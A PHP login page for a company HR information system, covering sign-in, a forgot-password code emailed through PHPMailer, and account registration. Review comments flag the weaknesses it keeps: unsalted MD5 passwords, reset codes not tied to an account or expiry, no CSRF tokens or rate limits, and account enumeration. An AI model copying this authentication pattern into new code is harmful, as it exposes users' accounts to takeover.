files >> /home/gracious/hris.graciousphils.com/backup hris employee/index.php
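<?php
/**
 * HRIS landing page: employee sign-in, "forgot password" OTP mail, and the
 * first step of self-registration.
 *
 * All POST handling runs before any markup is emitted so that the session id
 * can be rotated and a Location header can still be sent after a successful
 * sign-in. Handler feedback is collected in $alerts and printed inside <body>.
 *
 * Expects includes/config.php to provide a PDO handle in $dbh.
 *
 * NOTE(review): items this file cannot fix on its own:
 *  - Passwords are compared as unsalted MD5 (column PW). Migrate to
 *    password_hash()/password_verify() together with the registration and
 *    reset pages that write that column.
 *  - The OTP row in tblotp carries no employee id or expiry in the INSERT
 *    below, and nothing here limits sign-in or OTP attempts. otp.php is not
 *    visible from this file; confirm how it ties a code to an account.
 *  - None of the three forms carries an anti-CSRF token.
 *  - Values are HTML-encoded before they are stored/looked up. That is kept
 *    for compatibility with existing rows; encoding belongs at output time.
 */

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

session_start();
include('includes/config.php');

/**
 * Return a POST field as a string; missing or non-string values become ''.
 */
function hris_post_field(string $name): string
{
    $value = $_POST[$name] ?? '';

    return is_string($value) ? $value : '';
}

/**
 * Build one dismissible Bootstrap alert.
 *
 * $html must be static, trusted markup; callers never pass request data.
 */
function hris_alert(string $level, string $html): string
{
    return "<div class='alert alert-dismissible alert-{$level}'> "
        . "<button type='button' class='btn-close' data-bs-dismiss='alert'></button> "
        . $html
        . ' </div>';
}

$alerts = '';

try {
    // ---------------------------------------------------------------
    // Forgot password: mail a one-time code plus a link to otp.php.
    // ---------------------------------------------------------------
    if (isset($_POST['editpass'])) {
        $rawEmpCode = hris_post_field('empcode');
        $empcode    = htmlspecialchars($rawEmpCode, ENT_QUOTES, 'UTF-8');
        $emailcode  = htmlspecialchars(hris_post_field('emailcode'), ENT_QUOTES, 'UTF-8');

        // URL-encode the query value first, then HTML-encode the whole URL for
        // the attribute and the link text.
        // NOTE(review): the URL has no scheme, so mail clients may treat it as
        // a relative link; confirm the intended https:// origin and add it.
        $resetUrl = htmlspecialchars(
            'hris.graciousphils.com/otp.php?ecd=' . rawurlencode($rawEmpCode),
            ENT_QUOTES,
            'UTF-8'
        );
        $mess = "<a href='{$resetUrl}'>{$resetUrl}</a>";

        $sql   = 'SELECT * FROM tblemployees where EmailId = :emailcode and EmpId = :empcode';
        $query = $dbh->prepare($sql);
        $query->bindParam(':empcode', $empcode, PDO::PARAM_STR);
        $query->bindParam(':emailcode', $emailcode, PDO::PARAM_STR);
        $query->execute();

        if ($query->rowCount() > 0) {
            require_once 'class/src/Exception.php';
            require_once 'class/src/PHPMailer.php';
            require_once 'class/src/SMTP.php';

            // The SMTP password is read from the environment instead of being
            // embedded in this file. The variable name is chosen here; set it in
            // the deployment environment. The password that used to be hard-coded
            // in this file must be treated as exposed and rotated.
            $smtpPassword = getenv('HRIS_SMTP_PASSWORD');

            if ($smtpPassword === false || $smtpPassword === '') {
                error_log('HRIS forgot-password: SMTP password is not configured');
                $alerts .= hris_alert('info', '<strong>Message could not be sent.</strong>');
            } else {
                // CSPRNG instead of mt_rand(): the code is an authentication secret.
                // NOTE(review): five digits is a small space; see file header.
                $otp = random_int(10000, 99999);

                try {
                    // PHPMailer(true) throws on failure, so errors are handled
                    // in the catch block rather than via send()'s return value.
                    $mail = new PHPMailer(true);
                    $mail->isSMTP();
                    $mail->Host       = 'mail.graciousphils.com';
                    $mail->SMTPAuth   = true;
                    $mail->Username   = 'administrator@graciousphils.com';
                    $mail->Password   = $smtpPassword;
                    $mail->SMTPSecure = 'ssl'; // implicit TLS, matches port 465
                    $mail->Port       = 465;

                    $mail->setFrom('administrator@graciousphils.com', 'Change Password Form');
                    $mail->addAddress(hris_post_field('emailcode'));
                    $mail->addReplyTo('administrator@graciousphils.com');
                    $mail->isHTML(true);

                    // Fixed subject: the hidden "subject" form field is client
                    // controlled and must not decide what the admin mailbox sends.
                    $mail->Subject = 'Forgot Password Form';
                    $mail->Body    = "<strong>{$otp}</strong>"
                        . ' is your authentication code. For your protection please do not share this code to anyone'
                        . ', <br>'
                        . ' Click this link to change your password or copy and paste it on your browser '
                        . $mess;

                    $mail->send();

                    $sql   = "INSERT INTO tblotp (col_otp,is_used) values (:otp, '0')";
                    $query = $dbh->prepare($sql);
                    $query->bindValue(':otp', (string) $otp, PDO::PARAM_STR);
                    $query->execute();

                    $alerts .= hris_alert(
                        'info',
                        'Message and link successfully sent to your <strong>Email</strong>, please check.'
                    );
                } catch (Exception $e) {
                    // Keep transport details (host, auth errors) in the server log only.
                    error_log('HRIS forgot-password mail failure: ' . $e->getMessage());
                    $alerts .= hris_alert('info', '<strong>Message could not be sent.</strong>');
                }
            }
        } else {
            // NOTE(review): this answer tells the caller whether a Biocode/email
            // pair exists; a uniform response would avoid account enumeration.
            $alerts .= hris_alert('info', '<strong>Biocode or Email</strong> you enter is not on the list.');
        }
    }

    // ---------------------------------------------------------------
    // Sign in.
    // ---------------------------------------------------------------
    if (isset($_POST['signin'])) {
        $uname = htmlspecialchars(hris_post_field('username'), ENT_QUOTES, 'UTF-8');
        // NOTE(review): unsalted MD5, kept only to match the stored values.
        $password = md5(hris_post_field('password'));

        $sql   = 'SELECT * FROM tblemployees WHERE EmailId=:uname and PW=:password';
        $query = $dbh->prepare($sql);
        $query->bindParam(':uname', $uname, PDO::PARAM_STR);
        $query->bindParam(':password', $password, PDO::PARAM_STR);
        $query->execute();
        $results = $query->fetchAll(PDO::FETCH_OBJ);

        if (count($results) > 0) {
            // If several rows match, the last one wins (as before).
            $employee = end($results);

            if ($employee->Status == 0) {
                // Inactive accounts get no session data at all.
                $alerts .= hris_alert(
                    'info',
                    '<strong>Your account is Inactive. Please contact admin;</strong>'
                );
            } else {
                // Rotate the session id on privilege change (session fixation).
                if (!headers_sent()) {
                    session_regenerate_id(true);
                }

                $_SESSION['eid']      = $employee->id;
                $_SESSION['empid']    = $employee->EmpId;
                $_SESSION['dept']     = $employee->Department;
                $_SESSION['fname']    = $employee->FirstName;
                $_SESSION['mname']    = $employee->MiddleName;
                $_SESSION['lname']    = $employee->LastName;
                $_SESSION['email']    = $employee->EmailId;
                $_SESSION['ecomp']    = $employee->Company;
                $_SESSION['ext']      = $employee->Suffix;
                $_SESSION['emppos']   = $employee->Position;
                $_SESSION['nick']     = $employee->NickName;
                $_SESSION['gender']   = $employee->Gender;
                $_SESSION['poslvl']   = $employee->Position_Level;
                $_SESSION['area']     = $employee->Company_Area;
                $_SESSION['emplogin'] = hris_post_field('username');

                if (!headers_sent()) {
                    header('Location: bulletinboard.php');
                    exit;
                }

                // Fallback when something already produced output.
                $alerts .= "<script type='text/javascript'> document.location = 'bulletinboard.php'; </script>";
            }
        } else {
            $alerts .= hris_alert('info', '<strong>Invalid Details</strong> please try again.');
        }
    }

    // ---------------------------------------------------------------
    // Create an account, step one: queue a verification request.
    // ---------------------------------------------------------------
    if (isset($_POST['proceed'])) {
        $fname   = htmlspecialchars(hris_post_field('fname'), ENT_QUOTES, 'UTF-8');
        $mname   = htmlspecialchars(hris_post_field('mname'), ENT_QUOTES, 'UTF-8');
        $lname   = htmlspecialchars(hris_post_field('lname'), ENT_QUOTES, 'UTF-8');
        $emailid = htmlspecialchars(hris_post_field('emailid'), ENT_QUOTES, 'UTF-8');

        if ($fname === '' || $lname === '' || $emailid === '') {
            // "required" in the form is only a browser hint; enforce it here too.
            $alerts .= hris_alert('danger', '<strong>Failed to submit request.</strong>');
        } else {
            $sql   = 'SELECT * FROM tblemployees where EmailId = :emailid';
            $query = $dbh->prepare($sql);
            $query->bindParam(':emailid', $emailid, PDO::PARAM_STR);
            $query->execute();

            if ($query->rowCount() > 0) {
                $alerts .= hris_alert(
                    'warning',
                    "<strong>Email is already on the list you must be using someone's Email.</strong>"
                );
            } else {
                $sql   = 'SELECT * FROM tblemployees where FirstName = :fname and MiddleName = :mname and LastName = :lname';
                $query = $dbh->prepare($sql);
                $query->bindParam(':fname', $fname, PDO::PARAM_STR);
                $query->bindParam(':mname', $mname, PDO::PARAM_STR);
                $query->bindParam(':lname', $lname, PDO::PARAM_STR);
                $query->execute();

                if ($query->rowCount() > 0) {
                    $alerts .= hris_alert(
                        'warning',
                        "<strong>Employee Name is already on the list you must be using someone's name.</strong>"
                    );
                } else {
                    // CSPRNG instead of mt_rand() for the verification code.
                    $verifier = (string) random_int(100000, 999999);

                    $sql   = 'INSERT INTO tbl_verifier (Emp_Name,Emp_Mname,Emp_Lname,Emp_Email,Emp_Otp, is_used, verified) '
                        . 'values (:fname, :mname, :lname, :emailid, :verifier, :isused, :ver)';
                    $query = $dbh->prepare($sql);
                    $query->bindValue(':fname', $fname, PDO::PARAM_STR);
                    $query->bindValue(':mname', $mname, PDO::PARAM_STR);
                    $query->bindValue(':lname', $lname, PDO::PARAM_STR);
                    $query->bindValue(':emailid', $emailid, PDO::PARAM_STR);
                    $query->bindValue(':verifier', $verifier, PDO::PARAM_STR);
                    $query->bindValue(':isused', '0', PDO::PARAM_STR);
                    $query->bindValue(':ver', '0', PDO::PARAM_STR);
                    $query->execute();

                    if ($query->rowCount() > 0) {
                        $alerts .= hris_alert(
                            'success',
                            "<strong>Request Successfull Submitted.</strong><a href='verifier.php'> Click HERE! To Continue Registration</a>"
                        );
                    } else {
                        // Failure is shown as a failure (was styled alert-success).
                        $alerts .= hris_alert('danger', '<strong>Failed to submit request.</strong>');
                    }
                }
            }
        }
    }
} catch (PDOException $e) {
    // Driver messages can reveal schema and connection details; log, don't print.
    error_log('HRIS index.php database error: ' . $e->getMessage());
    $alerts .= hris_alert('danger', '<strong>Something went wrong.</strong> Please try again later.');
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Title -->
    <!--<title>ELMS | Home Page</title>-->
    <title>Human Resources Information System</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="includes/assets/bootstrap.min.css">
    <?php
    // NOTE(review): jQuery 1.8.2 is long out of support and is loaded from a
    // third-party CDN without Subresource Integrity. Upgrade it and pin the
    // file with an integrity attribute, as the Bootstrap bundle below does.
    ?>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    <script type="text/javascript" src="scripts.js"></script>
    <link rel="stylesheet" type="text/css" href="styles.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Poppins', sans-serif
        }

        body {
            background: #ecf0f3
        }

        .wrapper {
            max-width: 350px;
            min-height: 500px;
            margin: 80px auto;
            padding: 40px 30px 30px 30px;
            background-color: #ecf0f3;
            border-radius: 15px;
            box-shadow: 05px 05px 20px #cbced1, -05px -05px 20px #cbced1
        }

        .logo {
            width: 100%;
            margin: auto
        }

        .logo img {
            width: 100%;
            height: 80px;
            object-fit: cover;
            border-radius: 50%;
            box-shadow: 0px 0px 3px #5f5f5f, 0px 0px 0px 5px #ecf0f3, 8px 8px 15px #a7aaa7, -8px -8px 15px #fff
        }

        .wrapper .name {
            font-weight: 600;
            font-size: 1.4rem;
            letter-spacing: 1.3px;
            padding-left: 10px;
            color: #555
        }

        .wrapper .form-field input {
            width: 100%;
            display: block;
            border: none;
            outline: none;
            background: none;
            font-size: 1.2rem;
            color: #666;
            padding: 10px 15px 10px 10px
        }

        .wrapper .form-field {
            padding-left: 10px;
            margin-bottom: 20px;
            border-radius: 20px;
            box-shadow: inset 8px 8px 8px #cbced1, inset -8px -8px 8px #fff
        }

        .wrapper .form-field .fas {
            color: #555
        }

        .wrapper .btn {
            box-shadow: none;
            width: 100%;
            height: 40px;
            background-color: #03A9F4;
            color: #fff;
            border-radius: 25px;
            box-shadow: 3px 3px 3px #b1b1b1, -3px -3px 3px #fff;
            letter-spacing: 1.3px
        }

        .wrapper .btn:hover {
            background-color: #039BE5
        }

        .wrapper a {
            text-decoration: none;
            font-size: 0.8rem;
            color: #03A9F4
        }

        .wrapper a:hover {
            color: #039BE5
        }

        @media(max-width: 380px) {
            .wrapper {
                margin: 30px 20px;
                padding: 40px 15px 15px 15px
            }
        }
    </style>
    <!-- Theme Styles -->
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="http://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
    <script src="http://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <script type="text/javascript">
        window.history.forward();
        function noBack() {
            window.history.forward();
        }
    </script>
</head>
<body>
<?php echo $alerts; ?>

<div class="wrapper">
    <div class="logo">
        <div class="text-center mt-4 name"> Employee Login </div>
        <form class="p-3 mt-3" name="signin" method="post">
            <div class="form-field d-flex align-items-center">
                <span class="far fa-user"></span>
                <input id="username" type="text" name="username" class="validate" placeholder="Email Address">
            </div>
            <div class="form-field d-flex align-items-center">
                <span class="fas fa-key"></span>
                <input id="password" type="password" class="validate" name="password" placeholder="Password">
            </div>
            <div class="text-center fs-6">
                <a data-bs-toggle="modal" data-bs-target="#staticBackdrop">Create an Account</a>
            </div>
            <div class="text-center fs-6">
                <a data-bs-toggle="modal" data-bs-target="#forgotpass">Forgot Password</a>
            </div>
            <input id="position" type="hidden" name="position" class="validate" value="Staff">
            <input type="submit" name="signin" value="Sign in" class="btn mt-3">
        </form>
    </div>
</div>

<div class="modal fade" id="staticBackdrop" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <form method="POST">
                <div class="modal-header bg-primary">
                    <h5 class="modal-title text-white" id="staticBackdropLabel">Create an Account</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <div class="card">
                        <div class="card-body">
                            <div class="form-group">
                                <label class="col-form-label mt-2 " for="inputDefault">First Name</label>
                                <input type="text" class="form-control" placeholder="Your Name Here" id="fname" name="fname" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');">
                            </div>
                            <div class="form-group">
                                <label class="col-form-label mt-2 " for="inputDefault">Middle Name(Optional)</label>
                                <input type="text" class="form-control" placeholder="Your Middle Name Here" id="mname" name="mname" autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');">
                            </div>
                            <div class="form-group">
                                <label class="col-form-label mt-2 " for="inputDefault">Last Name</label>
                                <input type="text" class="form-control" placeholder="Your Last Name Here" id="lname" name="lname" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z,.''. \u00d1 \u00f1]/g, '').replace(/(..*)\./g, '$1');">
                            </div>
                            <div class="form-group">
                                <label class="col-form-label mt-2 " for="inputDefault">Email</label>
                                <input type="email" class="form-control" placeholder="Your Email Here" id="emailid" name="emailid" required autocomplete="off">
                            </div>
                            <div class="form-group mt-2">
                                <input class="form-check-input bg-dark" type="checkbox" id="checkboxNoLabel" value="" aria-label="..." required>
                                By filling out and submitting this form, I allow Human Resources Department to collect, process, store and access my personal information in compliance with the Data Privacy Act of 2012. I hereby certify that all entries are true and correct.
                                <a href="dataprivacy/privacyact.pdf" target="_BLANK">View Data Privacy Act</a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="modal-footer bg-primary">
                    <button type="button" class="btn btn-danger" data-bs-dismiss="modal">Close</button>
                    <button type="submit" class="btn btn-primary border-white" id="proceed" name="proceed">Proceed</button>
                </div>
            </form>
        </div>
    </div>
</div>

<div class="modal fade" id="forgotpass" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="forgotpassLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <form method="POST">
                <div class="modal-header bg-primary text-white">
                    <h5 class="modal-title" id="forgotpassLabel">Forgot Password</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <div class="form-group">
                        <label class="form-label">Please fill the needed information</label>
                        <div class="form-floating">
                            <input type="text" class="form-control" id="empcode" name="empcode" placeholder="Bio Code" autocomplete="off" required maxlength="11">
                            <label for="empcode" class="text-dark">Employee Biocode</label>
                        </div>
                        <div class="form-floating mb-3 mt-2">
                            <input type="email" class="form-control" id="emailcode" name="emailcode" placeholder="name@example.com" autocomplete="off" required>
                            <label for="emailcode" class="text-dark">Email address</label>
                        </div>
                        <div class="row">
                            <div class="col-md-12 form-group">
                                <input type="hidden" class="form-control" id="subject" name="subject" value="Forgot Password Form" maxlength="50">
                            </div>
                        </div>
                    </div>
                </div>
                <div class="modal-footer bg-primary">
                    <button type="button" class="btn btn-danger" data-bs-dismiss="modal">Close</button>
                    <button type="submit" class="btn btn-primary border-white" id="editpass" name="editpass">Submit</button>
                </div>
            </form>
        </div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
<?php
// NOTE(review): the handler below only discourages casual use of dev tools,
// copy/paste and the context menu. It is not a security control, and because
// it also swallows Ctrl+V it interferes with pasting from a password manager.
// Server-side checks are what protect this page.
?>
<script type="text/javascript">
    document.onkeydown = function (e) {
        var key = String.fromCharCode(e.keyCode);
        var ctrlOrMeta = e.ctrlKey || e.metaKey;

        // F12
        if (e.keyCode == 123) {
            return false;
        }
        // Ctrl + U/C/X/Y/Z/V/S/H/A/F/E (with or without Shift)
        if (e.ctrlKey && 'UCXYZVSHAFE'.indexOf(key) !== -1) {
            return false;
        }
        // Ctrl + Shift + I/J
        if (e.ctrlKey && e.shiftKey && 'IJ'.indexOf(key) !== -1) {
            return false;
        }
        // (Ctrl or Cmd) + Shift + C
        if (e.keyCode == 67 && e.shiftKey && ctrlOrMeta) {
            return false;
        }
        // (Ctrl or Cmd) + Alt + I/J
        if (e.altKey && ctrlOrMeta && 'IJ'.indexOf(key) !== -1) {
            return false;
        }
        // Cmd + V, or Cmd + Alt + anything
        if ((key === 'V' && e.metaKey) || (e.metaKey && e.altKey)) {
            return false;
        }
    };

    if (document.addEventListener) {
        document.addEventListener('contextmenu', function (e) {
            e.preventDefault();
        }, false);
    } else {
        document.attachEvent('oncontextmenu', function () {
            window.event.returnValue = false;
        });
    }
</script>
</body>
</html>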